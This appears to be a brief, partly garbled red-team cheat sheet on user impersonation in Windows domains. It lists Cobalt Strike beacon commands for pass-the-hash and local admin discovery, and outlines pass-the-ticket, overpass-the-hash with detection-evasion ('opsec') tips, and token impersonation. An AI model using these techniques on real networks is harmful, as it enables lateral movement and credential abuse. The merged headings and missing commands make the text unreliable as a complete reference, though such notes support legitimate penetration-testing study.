User Impersonation
User Impersonation
1) Pass-the-Hash Attack
beacon> getuid
beacon> ls \\web.dev.cyberbotic.io\c$PTH using inbuild method in CS (internally uses Mimikatz)
beacon> pth DEV\jking <hash>Find Local Admin Access
beacon> powerpick Find-LocalAdminAccess
beacon> rev2self2) Pass-the-Ticket Attack
Create a sacrificial token with dummy credentials
Inject the TGT ticket into logon session returned as output of previous command
OR Combine above 2 steps in one
3) Overpass-the-Hash
Use aes256 hash for better opsec, along with /domain and /opsec flags (better opsec)
4) Token Impersonation and Process Injection
Last updated